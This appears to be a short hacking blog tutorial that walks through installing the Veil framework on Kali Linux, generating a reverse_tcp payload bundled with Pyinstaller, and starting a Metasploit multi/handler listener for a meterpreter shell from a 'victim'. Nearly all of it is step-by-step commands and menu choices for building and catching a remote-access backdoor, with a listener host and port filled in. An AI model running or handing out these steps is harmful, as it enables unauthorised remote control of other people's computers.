Requirements: Linux with Metasploit Framework and Veil
Download Veil here!
I used for this Tutorial Kali Linux: http://www.kali.org
So first of all, download and unzip the Veil Package!
(I will use [ code] for the commands!)
now navigate to the setup directory in the Veil Folder
cd setup
Then run setup.sh
./setup.sh
Now you just have to click always “Forward” until Python 2.7.5, Pywin and Pycrypto is set up!
![[Image: 5506aeec90b626636776ddcb8f75f130.png]](https://www.ethicalhackx.com/blog/wp-content/uploads/2013/12/5506aeec90b626636776ddcb8f75f130-300x224.png)
Open now Veil Folder and Veil.py
./Veil.py
You can see 9 Options, select one you like!
a Number from 1-9
Then use the default msfvenom!
1
![[Image: d08013803ee965db71c584203766c66d.png]](https://www.ethicalhackx.com/blog/wp-content/uploads/2013/12/d08013803ee965db71c584203766c66d-300x225.png)
Use Reverse_Tcp
1
and Pyinstaller!
1
Now it will generate a Payload for you !
![[Image: f10278031d1343b829184a4813687d51.png]](https://www.ethicalhackx.com/blog/wp-content/uploads/2013/12/f10278031d1343b829184a4813687d51-300x224.png)
Again open a new Kali Terminale and open the Metasploit Console
msfconsole
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.178.1 [your local or remote host]
set lport 2357 [the port you selected]
exploit
![[Image: 5d4faa452a4eed0c33f6952221271469.png]](https://www.ethicalhackx.com/blog/wp-content/uploads/2013/12/5d4faa452a4eed0c33f6952221271469-300x225.png)
Congratualtion, your Payload was generated successfully!